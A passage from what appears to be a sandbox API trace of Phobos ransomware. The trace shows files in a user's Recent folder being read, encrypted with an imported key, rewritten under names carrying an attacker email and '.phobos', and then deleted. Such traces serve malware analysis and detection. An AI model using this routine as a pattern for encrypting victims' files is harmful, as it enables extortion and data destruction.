dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.871] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KHAg3aeSzIAQ7EZZfgDY.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\khag3aesziaq7ezzfgdy.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.872] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.872] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.872] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xef7, lpOverlapped=0x0) returned 1 [0200.874] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf00, dwBufLen=0xf00 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf00) returned 1 [0200.874] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf00, lpOverlapped=0x0) returned 1 [0200.875] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.875] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.875] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0200.875] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.875] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0200.875] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.876] CloseHandle (hObject=0x124) returned 1 [0200.876] CloseHandle (hObject=0x178) returned 1 [0200.876] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KHAg3aeSzIAQ7EZZfgDY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\khag3aesziaq7ezzfgdy.lnk")) returned 1 [0200.877] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KnNS9WDAiiFvVYz7D-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\knns9wdaiifvvyz7d-.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.878] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=619) returned 1 [0200.878] CloseHandle (hObject=0x178) returned 1 [0200.878] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KnNS9WDAiiFvVYz7D-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\knns9wdaiifvvyz7d-.lnk")) returned 0x20 [0200.879] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KnNS9WDAiiFvVYz7D-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\knns9wdaiifvvyz7d-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KnNS9WDAiiFvVYz7D-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\knns9wdaiifvvyz7d-.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.879] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.879] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KnNS9WDAiiFvVYz7D-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\knns9wdaiifvvyz7d-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.879] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.880] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.880] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x26b, lpOverlapped=0x0) returned 1 [0200.881] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270, dwBufLen=0x270 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270) returned 1 [0200.881] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x270, lpOverlapped=0x0) returned 1 [0200.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.882] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.882] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.882] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.882] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.882] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.882] CloseHandle (hObject=0x178) returned 1 [0200.882] CloseHandle (hObject=0x124) returned 1 [0200.882] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KnNS9WDAiiFvVYz7D-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\knns9wdaiifvvyz7d-.lnk")) returned 1 [0200.883] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KSrK Dj1c.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ksrk dj1c.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.883] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2509) returned 1 [0200.883] CloseHandle (hObject=0x124) returned 1 [0200.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KSrK Dj1c.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ksrk dj1c.mkv.lnk")) returned 0x20 [0200.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KSrK Dj1c.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ksrk dj1c.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KSrK Dj1c.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ksrk dj1c.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.883] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.884] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KSrK Dj1c.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ksrk dj1c.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.884] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.884] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.884] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9cd, lpOverlapped=0x0) returned 1 [0200.885] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9d0, dwBufLen=0x9d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9d0) returned 1 [0200.885] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x9d0, lpOverlapped=0x0) returned 1 [0200.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.886] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.886] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.886] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.886] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.886] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.886] CloseHandle (hObject=0x124) returned 1 [0200.886] CloseHandle (hObject=0x178) returned 1 [0200.887] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KSrK Dj1c.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ksrk dj1c.mkv.lnk")) returned 1 [0200.887] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ktT xIdVRRvSjlr_RcuY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ktt xidvrrvsjlr_rcuy.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.888] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1065) returned 1 [0200.888] CloseHandle (hObject=0x178) returned 1 [0200.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ktT xIdVRRvSjlr_RcuY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ktt xidvrrvsjlr_rcuy.lnk")) returned 0x20 [0200.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ktT xIdVRRvSjlr_RcuY.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ktt xidvrrvsjlr_rcuy.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ktT xIdVRRvSjlr_RcuY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ktt xidvrrvsjlr_rcuy.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.888] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.888] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ktT xIdVRRvSjlr_RcuY.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ktt xidvrrvsjlr_rcuy.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.889] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.889] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x429, lpOverlapped=0x0) returned 1 [0200.890] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430, dwBufLen=0x430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430) returned 1 [0200.890] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x430, lpOverlapped=0x0) returned 1 [0200.891] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.891] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.891] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0200.891] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.891] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0200.891] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.891] CloseHandle (hObject=0x178) returned 1 [0200.891] CloseHandle (hObject=0x124) returned 1 [0200.891] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ktT xIdVRRvSjlr_RcuY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ktt xidvrrvsjlr_rcuy.lnk")) returned 1 [0200.892] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\l 6GHZf6G8H_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\l 6ghzf6g8h_.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.893] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2609) returned 1 [0200.893] CloseHandle (hObject=0x124) returned 1 [0200.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\l 6GHZf6G8H_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\l 6ghzf6g8h_.lnk")) returned 0x20 [0200.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\l 6GHZf6G8H_.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\l 6ghzf6g8h_.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\l 6GHZf6G8H_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\l 6ghzf6g8h_.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.893] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.893] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\l 6GHZf6G8H_.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\l 6ghzf6g8h_.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.894] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.894] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa31, lpOverlapped=0x0) returned 1 [0200.895] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa40, dwBufLen=0xa40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa40) returned 1 [0200.895] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa40, lpOverlapped=0x0) returned 1 [0200.896] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.896] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.896] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.896] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.896] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.896] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.896] CloseHandle (hObject=0x124) returned 1 [0200.896] CloseHandle (hObject=0x178) returned 1 [0200.896] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\l 6GHZf6G8H_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\l 6ghzf6g8h_.lnk")) returned 1 [0200.897] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LCY7v.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lcy7v.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.898] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2393) returned 1 [0200.898] CloseHandle (hObject=0x178) returned 1 [0200.898] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LCY7v.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lcy7v.lnk")) returned 0x20 [0200.898] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LCY7v.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lcy7v.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LCY7v.lnk" (normalized: "c:\\users\\5p5nrgjn0js 